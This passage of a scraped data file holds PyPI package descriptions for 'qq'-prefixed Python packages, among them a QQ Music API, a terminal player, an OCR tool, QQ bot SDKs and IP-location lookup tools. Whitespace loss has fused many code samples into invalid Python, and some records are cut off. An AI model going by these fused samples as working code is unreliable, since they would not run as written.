\u52d5\u304d\u306f\u59cb\u3081\u308b\\n[03:12.99]\\n[03:34.65]\u3069\u3046\u3059\u308c\u3070 \u3053\u306e\u5fc3\u306f \u93e1\u306b\u6620\u308b\u306e?\\n[03:45.32]\\n[03:48.19]\u5c4a\u304b\u306a\u3044\u604b\u3092\u3057\u3066\u3044\u3066\u3082\\n[03:55.24]\u6620\u3057\u3060\u3059\u65e5\u304c\u304f\u308b\u304b\u306a\\n[04:01.67]\u307c\u3084\u3051\u305f\u7b54\u3048\u304c \u898b\u3048\u59cb\u3081\u308b\u307e\u3067\u306f\\n[04:09.34]\u4eca\u3082\u3053\u306e\u604b\u306f \u52d5\u304d\u51fa\u305b\u306a\u3044\">>>lyric.trans\"[ti:\u5c4a\u304b\u306a\u3044\u604b '13(TV\u30a2\u30cb\u30e1\u300cWHITE ALBUM2\u300dOP)]\\n[ar:\u4e0a\u539f\u308c\u306a]\\n[al:TV\u30a2\u30cb\u30e1\u300cWHITE ALBUM2\u300dOP\u30c6\u30fc\u30de\u300c\u5c4a\u304b\u306a\u3044\u604b\u201913\u300d]\\n[by:]\\n[offset:0]\\n[00:00.00]//\\n[00:08.36]//\\n[00:16.73]//\\n[00:25.10]\u83ab\u975e\u4f60\u662f\u5728\u6545\u4f5c\u5b64\u72ec\uff1f\\n[00:31.72]\u4e3a\u4f55\u5fc3\u5982\u6b64\u4e3a\u4f60\u7275\u52a8\\n[00:38.15]\u56de\u8fc7\u795e\u6765 \u4e0d\u77e5\u4e0d\u89c9\\n[00:45.76]\u6211\u5df2\u7ecf\u88ab\u4f60\u6df1\u6df1\u5438\u5f15\\n[00:54.06]\u8981\u600e\u6837\u624d\u80fd\u5c06\u6211\u7684\u5fc3 \u6620\u5728\u955c\u4e2d\u8ba9\u4f60\u770b\u6e05\uff1f\\n[01:08.47]\u5373\u4f7f\u662f\u573a\u7ec8\u6210\u5962\u671b\u7684\u7231\u604b\\n[01:15.21]\u662f\u5426\u4e5f\u6709\u6620\u5728\u955c\u4e2d\u7684\u4e00\u5929\\n[01:21.45]\u5728\u80fd\u591f\u770b\u89c1\u9690\u7ea6\u7684\u66d9\u5149\u4e4b\u524d\\n[01:29.38]\u8fd9\u573a\u7231\u604b\u5982\u4eca\u4f9d\u7136\u5bf8\u6b65\u96be\u884c\\n[01:40.77]\\n[01:57.05]\u5f53\u6211\u7b2c\u4e00\u6b21\u51fa\u58f0\u76f8\u5524\\n[02:04.23]\u5f53\u4f60\u7b2c\u4e00\u6b21\u56de\u9996\u4e4b\u65f6\\n[02:11.28]\u4f60\u7684\u8eab\u5f71\u662f\u90a3\u4e48\u8000\u773c\\n[02:18.08]\u8ba9\u6211\u4e0d\u7981\u79fb\u5f00\u76ee\u5149\\n[02:25.82]\u8981\u600e\u6837\u624d\u80fd\u5c06\u6211\u7684\u540d\u6df1\u6df1\u5370\u5728\u4f60\u7684\u5fc3\u4e2d\uff1f\\n[02:37.67]\\n[02:40.30]\u5373\u4f7f\u662f\u573a\u6ca1\u6709\u7ed3\u679c\u7684\u7231\u604b\\n[02:47.66]\u662f\u5426\u4e5f\u6709\u6620\u5728\u4f60\u5fc3\u7684\u4e00\u5929\\n[02:53.84]\u54ea\u6015\u80fd\u770b\u89c1\u4e00\u4e1d\u9690\u7ea6\u7684\u66d9\u5149\\n[03:02.26]\u8fd9\u4efd\u7231\u604b\u4e00\u5b9a\u80fd\u591f\u5f00\u59cb\u8f6c\u52a8\\n[03:12.99]\\n[03:34.65]\u8981\u600e\u6837\u624d\u80fd\u5c06\u6211\u7684\u5fc3\u6620\u5728\u955c\u4e2d\u8ba9\u4f60\u770b\u6e05\uff1f\\n[03:45.32]\\n[03:48.19]\u5373\u4f7f\u662f\u573a\u7ec8\u6210\u5962\u671b\u7684\u7231\u604b\\n[03:55.24]\u662f\u5426\u4e5f\u6709\u6620\u5728\u955c\u4e2d\u7684\u4e00\u5929\\n[04:01.67]\u5728\u80fd\u591f\u770b\u89c1\u9690\u7ea6\u7684\u66d9\u5149\u4e4b\u524d\\n[04:09.34]\u8fd9\u573a\u7231\u604b\u5982\u4eca\u4f9d\u7136\u5bf8\u6b65\u96be\u884c\\n[04:20.90]\"Singer>>>fromQQMusicAPIimportQQMusic>>>music_list=QQMusic.search('\u5c4a\u304b\u306a\u3044\u604b')>>>song=music_list.data[0]>>>song.singer# \u4e00\u9996\u6b4c\u53ef\u80fd\u7531\u591a\u4eba\u5408\u5531\uff0c\u56e0\u6b64\u7ed3\u679c\u4e3a\u4e00\u4e2a\u5217\u8868[]>>>singer=song.singer[0]>>>type(singer)>>>singer.singer_mid'003jYRDr3aQCKi'>>>singer.name'\u4e0a\u539f\u308c\u306a'>>>singer.title'\u4e0a\u539f\u308c\u306a (\u4e0a\u539f\u73b2\u5948)'>>>singer.url'https://y.qq.com/n/yqq/singer/003jYRDr3aQCKi.html'>>>singer.extract()# \u83b7\u53d6\u8be6\u7ec6\u4fe1\u606f>>>singer.hot_music[,,,,,,, , , , ,,,,,,,,,,,,,,,,,,,]>>>singer_songs=singer.songs()>>>singer_songs,cursor_page=1,page_size=3,total_num=74>SingerSongPager\u7c7b\u4f3cSongSearchPagerTODO\u6b4c\u66f2\u6392\u884c\u699c\u7684\u83b7\u53d6\u6b4c\u624b\u67e5\u8be2\u5206\u7c7b\u6b4c\u5355\u4e13\u8f91MV\u4f18\u5148\u7ea7\uff1a\u65e0\uff08\u6ca1\u6709\u53cd\u9988\uff0c\u6211\u7684\u624b\u4f1a\u6296\uff09"} +{"package": "qqmusicbox", "pacakge-description": "# QQMusicBox![Build Status](https://travis-ci.org/lai-bluejay/qqmusicbox.svg?branch=master)\n![PyPI](https://img.shields.io/pypi/v/qqmusicbox.svg?style=flat)\n![GitHub code size in bytes](https://img.shields.io/github/languages/code-size/lai-bluejay/qqmusicbox.svg)\u53ea\u8981\u6709\u58f0\u5361\uff0c\u547d\u4ee4\u884c\u4e5f\u80fd\u64ad\u653e\u97f3\u4e50\u770b\u5230\u4e00\u6b3e[\u547d\u4ee4\u884c\u7684\u7f51\u6613\u4e91\ud83c\udfb5](https://github.com/darknessomi/musicbox/)\uff0c\u5fcd\u4e0d\u4f4f\u60f3\u7167\u7740\u5f00\u53d1\u4e00\u4e2a\u540c\u6b3e\u7684QQ\u97f3\u4e50\uff0c\u6574\u4f53\u4ee3\u7801\u7ed3\u6784\u8fd8\u662f\u53c2\u8003darkness\u7684\u7248\u672c\uff0c\u5728\u6b64\u7248\u672c\u4e0a\u5fae\u8c03\u3002qq\u97f3\u4e50api\u4f1a\u548c[meik-h](https://github.com/MeiK-h/QQMusicAPI)\u4e00\u8d77\u7ef4\u62a4## \u7279\u6027\u6682\u65f6\u53ea\u652f\u6301\u641c\u7d22\u97f3\u4e50\u2026\u2026.### \u952e\u76d8\u5feb\u6377\u952eKey | Effect | |\u2014\u2013 | \u2014\u2014\u2014\u2014\u2014 | \u2014\u2014\u2014 |j | Down | \u4e0b\u79fb |k | Up | \u4e0a\u79fb |h | Back | \u540e\u9000 |l | Forword | \u524d\u8fdb |u | Prev page | \u4e0a\u4e00\u9875 |d | Next page | \u4e0b\u4e00\u9875 |f | Search | \u5feb\u901f\u641c\u7d22 |[ | Prev song | \u4e0a\u4e00\u66f2 |] | Next song | \u4e0b\u4e00\u66f2 |= | Volume + | \u97f3\u91cf\u589e\u52a0 |- | Volume - | \u97f3\u91cf\u51cf\u5c11 |Space | Play/Pause | \u64ad\u653e/\u6682\u505c |m | Menu | \u4e3b\u83dc\u5355 |p | Present/History | \u5f53\u524d/\u5386\u53f2\u64ad\u653e\u5217\u8868 |i | Music Info | \u5f53\u524d\u97f3\u4e50\u4fe1\u606f |\u21e7+p | Playing Mode | \u64ad\u653e\u6a21\u5f0f\u5207\u6362 |\u21e7+a | Enter album | \u8fdb\u5165\u4e13\u8f91 |g | To the first | \u8df3\u81f3\u9996\u9879 |\u21e7+g | To the end | \u8df3\u81f3\u5c3e\u9879 |## \u5b89\u88c5### \u5fc5\u9009\u4f9d\u8d56mpg123\u7528\u4e8e\u64ad\u653e\u6b4c\u66f2 \u81ea\u884c\u641c\u7d22\u4e00\u4e0b\u5b89\u88c5\u529e\u6cd5\u5427### PyPi\u5b89\u88c5$ pip install qqmusicbox### Git clone\u5b89\u88c5master\u5206\u652f$ git clonehttps://github.com/lai-bluejay/qqmusicbox.git&& cd qqmusicbox\n$ python setup.py install### macOS\u5b89\u88c5$ pip install qqmusicbox\n$ brew install mpg123### Linux\u5b89\u88c5#### Ubuntu/Debian$ (sudo) pip install qqmusicbox$ (sudo) apt-get install mpg123#### Centos/Red Hat$ (sudo) pip(3) install qqmusicbox\n$ (sudo) wgethttp://mirror.centos.org/centos/7/os/x86_64/Packages/mpg123-1.25.6-1.el7.x86_64.rpm$ (sudo) yum install mpg123-1.25.6-1.el7.x86_64.rpm"} +{"package": "qqocr", "pacakge-description": "QQOcrA package used for simple OCR.Github:https://github.com/SummerColdWindContact the author:jugking6688@gmail.comOur bilibili:https://space.bilibili.com/3493127383943735Examples are as follows\uff1aFor learn:fromqqocrimportQQOcr# You must provide a method to binarize the characters in the picture# and import the external library in the function.defbinary(image):importnumpyasnpimportcv2low_range=np.array([0,0,0][::-1])high_range=np.array([100,100,100][::-1])returncv2.inRange(image,low_range,high_range)qq=QQOcr()# Dataset folder consists of many pictures and a 'label.txt'.# For 'label.txt', the format of each line is \"[filename]\\t[text]\".# For example, it can be: \"1.png 12345\".qq.load_dataset('./dataset')qq.set_binary(binary)qq.learn()# The suffix must be '.qmodel'.qq.save_model('./1.qmodel')For predict:fromqqocrimportQQOcrimportcv2qq=QQOcr()qq.load_model('./1.qmodel')text=qq.predict(cv2.imread('test.png'))print(text)"} +{"package": "qq_palindrome", "pacakge-description": "No description available on PyPI."} +{"package": "qqpat", "pacakge-description": "No description available on PyPI."} +{"package": "qq-picture-operation", "pacakge-description": "QQ_picture_operation\u8fdb\u884cqq\u56fe\u7247\u7684\u64cd\u4f5c\uff0c\u7528\u6765\u8f6c\u79fb\u590d\u5236\u5220\u9664\u56fe\u7247"} +{"package": "qq-plot", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qqpusher", "pacakge-description": "QQPUSHER\u672c\u9879\u76ee\u662fQQPusher\u548cQQPusherPro\u7684Python SDKQQPusher\u7684\u4f7f\u7528\u65b9\u6cd5\u8bf7\u53c2\u8003http://qqpusher.yanxianjun.com/QQPusherPro\u7684\u4f7f\u7528\u65b9\u6cd5\u8bf7\u53c2\u8003http://qqpusherpro.yanxianjun.com/\u672c\u9879\u76ee\u7684\u4f7f\u7528pip install qqpusherDemo\u8fd9\u91cc\u7684id\u53ef\u4ee5\u662fqq\u53f7\u4e5f\u53ef\u662fqq\u7fa4\u53f7importqqpusherimporttimeToken=\"xxxxxxxxxxxxxxxx\"Group_Id=\"xxxxxxxxxx\"Private_Id=\"xxxxxxxxxx\"if__name__=='__main__':qqpush1=qqpusher.qqpusher(token=Token,id=Private_Id,auto_escape=False)print(qqpush1.send_private_msg(\"\u6d4b\u8bd5\u79c1\u804a\u6d88\u606f\"))time.sleep(10)qqpush2=qqpusher.qqpusher(token=Token,id=Group_Id,auto_escape=False)print(qqpush2.send_group_msg(\"\u6d4b\u8bd5\u7fa4\u7ec4\u6d88\u606f\"))time.sleep(10)print(qqpush2.set_group_mute_all(True))time.sleep(10)print(qqpush2.set_group_mute(Private_Id,60))time.sleep(10)print(qqpush2.set_group_name(\"\u6d4b\u8bd5\u7fa4\u540d\"))time.sleep(10)print(qqpush2.set_group_memo(\"\u6d4b\u8bd5\u7fa4\u516c\u544a\"))\u51fd\u6570\u5217\u8868qqpushersend_private_msgsend_group_msgset_group_mute_allset_group_muteset_group_nameset_group_memoqqpusherproget_state_infosend_friend_msgsend_friend_jsonsend_friend_xmlsend_group_msgsend_group_jsonsend_group_xmladd_frienddelete_friendhandle_friend_eventjoin_groupquit_groupall_banbankick_group_memberadd_event\u9e23\u8c22yanxianjun\u5f00\u53d1\u7ef4\u62a4\u7684QQPusher\u63a8\u9001\u670d\u52a1"} +{"package": "qq.py", "pacakge-description": "\u2728 \u7528 Python \u7f16\u5199\u7684\u7528\u4e8e QQ\u9891\u9053\u673a\u5668\u4eba \u7684\u73b0\u4ee3\u5316\u3001\u6613\u4e8e\u4f7f\u7528\u3001\u529f\u80fd\u4e30\u5bcc\u4e14\u5f02\u6b65\u7684 API\u3002 \u2728\u4e3b\u8981\u7279\u70b9\u4f7f\u7528async\u548cawait\u7684\u73b0\u4ee3 Pythonic API\u3002\u4f18\u5316\u901f\u5ea6\u548c\u5185\u5b58\u3002\u5b89\u88c5\u9700\u8981 Python 3.8\u6216\u4ee5\u4e0a\u7684\u7248\u672c\u548c\u4e00\u6839\u63a5\u5165\u4e92\u8054\u7f51\u7684\u7f51\u7ebf\u3002\u8981\u5b89\u88c5\u5e93\uff0c\u4f60\u53ea\u9700\u8fd0\u884c\u4ee5\u4e0b\u547d\u4ee4\uff1apip3 install -U qq.py\u5feb\u901f\u793a\u4f8bfromqqimport*classMyClient(Client):asyncdefon_ready(self):print('\u4f7f\u7528',self.user,'\u767b\u9646')asyncdefon_message(self,message):# \u4e0d\u8981\u56de\u590d\u81ea\u5df1ifmessage.author==self.user:returnif'ping'inmessage.content:awaitmessage.channel.send('pong')if__name__=='__main__':client=MyClient()client.run(token='app_id.token')Bot \u793a\u4f8bimportqqfromqq.extimportcommandsbot=commands.Bot(command_prefix='>',owner_id='\u4f60\u7684\u7528\u6237ID')# owner_id \u662f int \u7c7b\u578b@bot.eventasyncdefon_ready():print(f'\u4ee5{bot.user}\u8eab\u4efd\u767b\u5f55\uff08ID\uff1a{bot.user.id}\uff09')print('------')@bot.command()asyncdefping(ctx):awaitctx.send('pong')bot.run('app_id.token')\u4f60\u53ef\u4ee5\u5728 example \u76ee\u5f55\u4e2d\u627e\u5230\u66f4\u591a\u793a\u4f8b\u3002\u94fe\u63a5\u6587\u6863QQ API\u5e2e\u52a9 QQ \u7fa4 - 583799186\u975e\u5b98\u65b9 Discord \u670d\u52a1\u5668"} +{"package": "qqq", "pacakge-description": "No description available on PyPI."} +{"package": "qqq22-nash", "pacakge-description": "No description available on PyPI."} +{"package": "qqqfome", "pacakge-description": "# Thank you follow me - \u8c22\u8c22\u4f60\u5173\u6ce8\u6211\u5440\uff01## \u7b80\u4ecb\u8fd9\u662f\u4e00\u4e2a\u7528\u4e8e\u81ea\u52a8\u7ed9\u77e5\u4e4e\u91cc\u4f60\u7684\u65b0\u5173\u6ce8\u8005\u53d1\u9001\u4e00\u6761\u4fe1\u606f\u7684\u540e\u53f0\u670d\u52a1\u3002\u6280\u672f\u6808\u4ec0\u4e48\u7684\u975e\u5e38\u7b80\u5355\uff1a- \u4ee5\u524d\u5199\u7684 `zhihu-py3` \u7528\u4e8e\u83b7\u53d6\u77e5\u4e4e\u4fe1\u606f- \u7528 `sqlite` \u6570\u636e\u5e93\u4fdd\u5b58\u8001\u7684\u5173\u6ce8\u8005- `daemon.py` \u7528\u4e8e\u5728 *unix \u73af\u5883\u4e0b\u521b\u5efa daemon proc## \u4f7f\u7528### \u5b89\u88c5```bashsudo python3 install qqqfome```### \u521b\u5efa\u5de5\u4f5c\u76ee\u5f55```bashcd /path/that/you/wantmkdir qqqfome_workcd qqqfome_work```### \u521d\u59cb\u5316\u6570\u636e\u5e93```bashqqqfome -v init```\u7136\u540e\u6839\u636e\u63d0\u793a\u767b\u5f55\u77e5\u4e4e\u3002\u8fc7\u7a0b\u4e2d\u9700\u8981\u9a8c\u8bc1\u7801\u2026\u2026\u5982\u679c\u4f60\u662f\u5728VPS\u4e0a\u90e8\u7f72\u7684\u8bdd\uff0c\u4f60\u5f97\u60f3\u529e\u6cd5\u628a `captcha.gif` \u6587\u4ef6\u4ece\u8fdc\u7a0b\u670d\u52a1\u5668\u5f04\u5230\u672c\u5730\u6765\u67e5\u770b\u9a8c\u8bc1\u7801\u2026\u2026\u5176\u5b9e\u6211\u66f4\u5efa\u8bae\u5728\u672c\u5730\u7528 `zhihu-py3` \u751f\u6210 cookies \u518d\u5f04\u5230 VPS \u4e0a\uff0c\u8fd9\u6837\u5c31\u53ef\u4ee5\u4f7f\u7528\uff1a```bashqqqfome -c /path/to/cookie -v init```\u6765\u7701\u7565\u767b\u5f55\u6b65\u9aa4\u3002\u5982\u679c\u4e00\u5207\u6b63\u5e38\u7684\u8bdd\uff0c\u4f60\u4f1a\u5f97\u5230\u4e00\u4e2a sqlite \u6570\u636e\u5e93\u6587\u4ef6\u3002\u540d\u5b57\u662f `.sqlite3`### \u542f\u52a8```bashqqqfome -m $'I\\'m {my_name}:\\nThank you follow me.' -d start .sqlite3```\uff08\u5982\u679c\u53ea\u662f\u6d4b\u8bd5\u7684\u8bdd\uff0c\u53ef\u4ee5\u53bb\u6389 `-d` \u53c2\u6570\uff0c\u8ba9\u4ed6\u5728\u524d\u53f0\u6a21\u5f0f\u8fd0\u884c\u3002\uff09`-m` \u53c2\u6570\u540e\u8ddf\u9700\u8981\u53d1\u9001\u7684\u4fe1\u606f\u3002\u6ce8\u610f\uff0c\u5982\u679c\u4f60\u5728\u6d88\u606f\u5185\u90e8\u4f7f\u7528\u4e86\u8f6c\u4e49\u5b57\u7b26\uff0c\u90a3\u4e48\u5355\u5f15\u53f7\u524d\u7684`$`\u7b26\u53f7\u662f\u5fc5\u9700\u7684\u3002\u6216\u8005\u4f60\u53ef\u4ee5\u5c06\u4fe1\u606f\u5199\u5728\u4e00\u4e2a\u6587\u4ef6\u91cc\uff0c\u7136\u540e\u4f7f\u7528 `-M` \u53c2\u6570\u6307\u5b9a\u6b64\u6587\u4ef6\u3002\u4e24\u4e2a\u90fd\u6ca1\u6709\u6307\u5b9a\u7684\u8bdd\uff0c\u9ed8\u8ba4\u7684\u6d88\u606f\u662f\uff1a```text\u4f60\u597d{your_name}\uff0c\u6211\u662f{my_name}\uff0c\u8c22\u8c22\u4f60\u5173\u6ce8\u6211\uff0c\u4f60\u662f\u6211\u7684\u7b2c{follower_num}\u53f7\u5173\u6ce8\u8005\u54df\uff01\u672c\u6d88\u606f\u7531qqqfome\u9879\u76ee\u81ea\u52a8\u53d1\u9001\u3002\u9879\u76ee\u5730\u5740\uff1ahttps://github.com/7sDream/qqqfome{now}```\u7a0b\u5e8f\u652f\u6301\u7684\u4e5f\u5c31\u662f\u4f8b\u5b50\u91cc\u7684\u8fd9\u51e0\u4e2a\u5b8f\u4e86\u2026\u2026## \u67e5\u770bLog```bashtail -f .sqlite3.log```\u9ed8\u8ba4\u7684 log \u6587\u4ef6\u540d\u662f `.sqlite3.log`\u8fd8\u6709\u4e00\u4e2a\u662f `.sqlite3.pid` \u8fd9\u4e2a\u6587\u4ef6\u4e0d\u8981\u5220\u3002### \u505c\u6b62\u5982\u679c\u4e0d\u662f\u540e\u53f0\u6a21\u5f0f\uff0c`Ctrl-C` \u5373\u53ef\u505c\u6b62\u3002\u5982\u679c\u662f Daemon \u6a21\u5f0f\uff0c\u5219\uff1a```bashqqqfome stop ```## \u6587\u6863\u8fd8\u6ca1\u5199\uff0c\u6682\u65f6\u7528 `qqqfome -h` \u51d1\u5408\u770b\u5427\u3002```textusage: qqqfome [-h] [-v] [-c FILE] [-p FILE] [-l FILE] [-t INTERVAL][-m MESSAGE | -M FILE] [-s NUM] [-d]{init,start,stop} [file]Thank-you-follow-me cli.positional arguments:{init,start,stop} command that you want execfile database file that you want run on.optional arguments:-h, --help show this help message and exit-v, --verbose turn on this to print info-c FILE, --cookies FILEprovide cookies file if you have to skip login-p FILE, --pid-file FILEpid file location-l FILE, --log-file FILElog file location-t INTERVAL, --time INTERVALset the interval time-m MESSAGE, --message MESSAGEthe message that you want to send to your new follower-M FILE, --message-file FILEthe message that you want to send to your new follower-s NUM, --stop-at NUMfound NUM continuously old followers will stop pass-d, --daemon work in daemon mode```## TODO- \u589e\u52a0 update \u547d\u4ee4\uff0c\u7528\u4e8e\u66f4\u65b0\u6570\u636e\u5e93\u91cc\u7684 cookies- \u9009\u9879 `--mc` \u6216\u8005\u7c7b\u4f3c\u7684\u4e1c\u897f\uff0c\u7528\u4e8e\u968f\u673a\u4ece\u6587\u4ef6\u4e2d\u9009\u53d6\u4e00\u6bb5\u6587\u672c\uff08\u4e00\u884c\uff0c\u6216\u8005\u4ee5\u7279\u5b9a\u5206\u9694\u7b26\u5206\u9694\u7684\u4e00\u6bb5\uff09\u7528\u4f5c message\u3002- \u5199\u4e2a\u6559\u7a0b- \u5b8c\u5584 readme \u548c \u6587\u6863- \u91cd\u6784\u4ee3\u7801- \u5199\u6d4b\u8bd5## LICENSEEMIT."} +{"package": "qqqq", "pacakge-description": "UNKNOWN"} +{"package": "qqq-test-hjahd", "pacakge-description": "\u7b80\u5355\u7684\u52a0\u51cf\u8fd0\u7b97\u4e0a\u4f20\u6d4b\u8bd5"} +{"package": "qqr", "pacakge-description": "QQR - a python library for QR code restorationA blazingly fast QR code restoration library for Python.Controlling the version number with bumpversionWhen you want to increment the version number for a new release usebumpversionto do it correctly across the whole library.\nFor example, to increment to a new patch release you would simply runbumpversion patchwhich given the.bumpversion.cfgmakes a new commit that increments the release version by one patch release."} +{"package": "qqsuperman", "pacakge-description": "UNKNOWN"} +{"package": "qqtest01", "pacakge-description": "This is the homepage of our project"} +{"package": "qq-training-wheels", "pacakge-description": "qq-training-wheels"} +{"package": "qq-tr-free", "pacakge-description": "qq-tr-freeQq translate for freeInstallationpip install qq-tr-free -UorInstall (pip or whatever) necessary requirements, e.g.pip install requests_cache jmespath fuzzywuzzyorpip install -r requirements.txtclone the repo (e.g.,git clone https://github.com/ffreemt/qq-tr-free.gitor downloadhttps://github.com/ffreemt/qq-tr-free/archive/master.zipand unzip) and change to the qq-tr-free folder and do apython setup.py developorpython setup.py installUsagefrom qq_tr import qq_tr\nprint(qq_tr('hello world')) # -> '\u4f60\u597d\u4e16\u754c'\nprint(qq_tr('hello world', to_lang='de')) # ->'Hallo Welt'\nprint(qq_tr('hello world', to_lang='fr')) # ->'Bonjour \u00e0 tous.'AcknowledgmentsThanks to everyone whose code was used"} +{"package": "qquant", "pacakge-description": "bayinfA library for Bayesian InferenceInstallationpip install --upgrade bayinf"} +{"package": "qquery", "pacakge-description": "This package provides a simple interface for reading Quicken For Mac databases. It inlcudes both a\npython module and a command line interface.Locating the DatabaseQuicken For Mac keeps its user files in~/Library/Application Support/Quicken.\nIn that directory the database file is inDocuments/Qdata.quicken/data(or thereabouts).\nFor safety, do not operate directly on this file. Make a copy as, for example:# cd '~/Library/Application Support/Quicken'\n# cd Documents/Qdata.quicken\n# cp data /tmp/copyofqdata\n# cd /tmp\n# file copyofqdata\ncopyofqdata: SQLite 3.x database, last written using SQLite version 3036000The output of the last command verifies that the file is ansqlitedatabase.Command Line ToolThe command line tool, also calledqquery, provides a simple, convenient interface to the database.\nIt offers many options, all of which are described with the \u2013help switch:# qquery --helpHere are some examples.List all accounts:# qquery --qdb=copyofqdata --list-accountsList all categories:# qquery --qdb=copyofqdata --list-categoriesList all transactions (this can create a lot of output):# qquery --qdb=copyofqdata --list-transactionsList only transations from account \u201cFirst National\u201d, category \u201cCharity\u201d, posted during the year 2016:# qquery --qdb=copyofqdata --list-transactions \\\n --restrict-to-accounts=\"First National\" \\\n --restrict-to-categories=\"Charity\" \\\n --date-from=2016-01-01 --date-to=2016-12-31Report on the balances (including details of secuities) of all accounts as of December 31, 2016.\n(Accounts with zero balance will not be listed):# qquery --qdb=copyofqdata --report-holdings --date-to=2016-12-31Python moduleThe module may be included in python programs in the the usual way. Help is also available.\nUse the following to get a list of all available functions:>>> import qquery\n>>> help (qquery)Here is how to list all accounts using the iterator provided by the functiongetAccounts().\nEach pass through the loop returns a dictionary for each account:>>> import qquery as qq\n>>> qq.open ('copyofqdata')\n>>> for account in qq.getAccounts():\n... print account\n...Similarly, this is how to list all categories by using the iterator provided by the functiongetCategories().\nEach pass through the loop returns a dictionary for each category:>>> import qquery as qq\n>>> qq.open ('copyofqdata')\n>>> for category in qq.getCategories():\n... print category\n...And for all transactions usinggetTransactions():>>> import qquery as qq\n>>> qq.open ('copyofqdata')\n>>> for trans in qq.getTransactions():\n... print trans\n...There are many fields supplied with eachtransdictionary, so the above will produce\na lot of output. One may instead choose to examine only some of those fields as in>>> import qquery as qq\n>>> qq.open ('copyofqdata')\n>>> for trans in qq.getTransactions():\n... print trans['date'], trans['amount'], trans['payeeName']\n...This can be further refined using thesetRestrictTofunctions, for example:>>> import qquery as qq\n>>> qq.open ('copyofqdata')\n>>> qq.setRestrictToAccounts ('First National')\n>>> qq.setRestrictToCategories ('Charity,Gifts')\n>>> qq.setRestrictToDates (dateFrom='2016-01-01', dateTo='2016-12-31')\n>>> for trans in qq.getTransactions():\n... print trans['date'], trans['amount'], trans['payeeName']\n...Next StepsThis is a lot more information in the Quicken database than is exposed through this interface.\nRequests for feature enhancements are welcome."} +{"package": "qqueue", "pacakge-description": "qqueuequick queue"} +{"package": "qqutils", "pacakge-description": "qqutilsCollection of reusable python functions."} +{"package": "qqweibo", "pacakge-description": "UNKNOWN"} +{"package": "qqwry", "pacakge-description": "QQWry is a binary file which contains ip-related locations information."} +{"package": "qqwry-linux-python3", "pacakge-description": "qqwry-linux-python3Linux\u4e0b\u81ea\u52a8\u66f4\u65b0qqwry\u7684\u5de5\u5177\u5b89\u88c5pip3installqqwry-linux-python3\u66f4\u65b0 qqwry.dat\u539f\u7406\u4ece\u5fae\u4fe1\u516c\u4f17\u53f7\u6587\u7ae0\u4e2d\u53d6\u51fa\u6700\u65b0zip\u5305\u5730\u5740\u5e76\u4e0b\u8f7dhttps://mp.weixin.qq.com/mp/appmsgalbum?__biz=Mzg3Mzc0NTA3NA==&action=getalbum&album_id=2329805780276838401zip\u5730\u5740\u5982\uff1ahttps://www.cz88.net/soft/H50VASDc3-2023-06-21.zip\u89e3\u538bzip\u5f97\u5230setup.exe\u89e3\u538bsetup.exe\u5f97\u5230qqwry.dat\u4ee3\u7801>>>fromqqwry.srcimportUpdateQQwry>>>uq=UpdateQQwry('./qqwry.dat')>>>uq.update()/usr/local/bin/innoextractisvalidhttps://www.cz88.net/soft/H50VASDc3-2023-06-21.zipDownloading...https://www.cz88.net/soft/H50VASDc3-2023-06-21.zipDownloadcompletedcopy/tmp/app/qqwry.datto/root/.nali/qqwry.datcompletedTrue\u4f7f\u7528 qqwry.dat>>>fromqqwry.srcimportQQwry>>>qw=QQwry()>>>qw.load_file('./qqwry.dat')True>>>print(qw.lookup('8.8.8.8'))('\u7f8e\u56fd\u52a0\u5229\u798f\u5c3c\u4e9a\u5dde\u5723\u514b\u62c9\u62c9\u53bf\u5c71\u666f\u5e02','\u8c37\u6b4c\u516c\u53f8DNS\u670d\u52a1\u5668')"} +{"package": "qqwry-py2", "pacakge-description": "\u7528\u4e8e\u5728qqwry.dat\u91cc\u67e5\u627eIP\u5730\u5740\u5f52\u5c5e\u5730\u3002\n\ufeff\u53e6\u63d0\u4f9b\u4e00\u4e2a\u4ece\u7eaf\u771f\u7f51\u7edc\u66f4\u65b0qqwry.dat\u7684\u5c0f\u5de5\u5177\u3002\u662fqqwry-py3\u6a21\u5757\u7684Python 2.7\u5b9e\u73b0\u7248\uff0c\u6587\u6863\u540c\u8be5\u6a21\u5757\uff1ahttps://pypi.org/project/qqwry-py3/"} +{"package": "qqwry-py3", "pacakge-description": "\u7528\u4e8e\u5728qqwry.dat\u91cc\u67e5\u627eIP\u5730\u5740\u5f52\u5c5e\u5730\uff0c\u53e6\u63d0\u4f9b\u4e00\u4e2a\u4ece\u7eaf\u771f\u7f51\u7edc\u66f4\u65b0qqwry.dat\u7684\u5c0f\u5de5\u5177\u3002\u5df2\u4e0a\u4f20\u5230PyPI\uff0c\u6267\u884c\u6b64\u547d\u4ee4\u5373\u53ef\u5b89\u88c5\uff1apip installqqwry-py3\ufeff\ufeff\u7279\u70b9for Python 3.0+\u3002\u63d0\u4f9b\u4e24\u5957\u5b9e\u73b0\u4f9b\u9009\u62e9\u3002\u6709\u4e00\u4e2a\u67e5\u627e\u901f\u5ea6\u66f4\u5feb\uff0c\u4f46\u52a0\u8f7d\u6162\u3001\u5360\u7528\u5185\u5b58\u591a\u3002\u5728i3 3.6GHz\uff0cPython 3.6\u4e0a\u67e5\u8be2\u901f\u5ea6\u8fbe18.0\u4e07\u6b21/\u79d2\u3002\u63d0\u4f9b\u4e00\u4e2a\u4ece\u7eaf\u771f\u7f51\u7edc(cz88.net)\u66f4\u65b0qqwry.dat\u7684\u5c0f\u5de5\u5177\uff0c\u7528\u6cd5\u89c1\u672c\u6587\u6700\u540e\u4e00\u90e8\u5206\u3002\u7528\u6cd5>>> from qqwry import QQwry\n>>> q = QQwry()\n>>> q.load_file('qqwry.dat')\n>>> q.lookup('8.8.8.8')\n('\u7f8e\u56fd', '\u52a0\u5229\u798f\u5c3c\u4e9a\u5dde\u5723\u514b\u62c9\u62c9\u53bf\u5c71\u666f\u5e02\u8c37\u6b4c\u516c\u53f8DNS\u670d\u52a1\u5668')\u89e3\u91caq.load_file(filename, 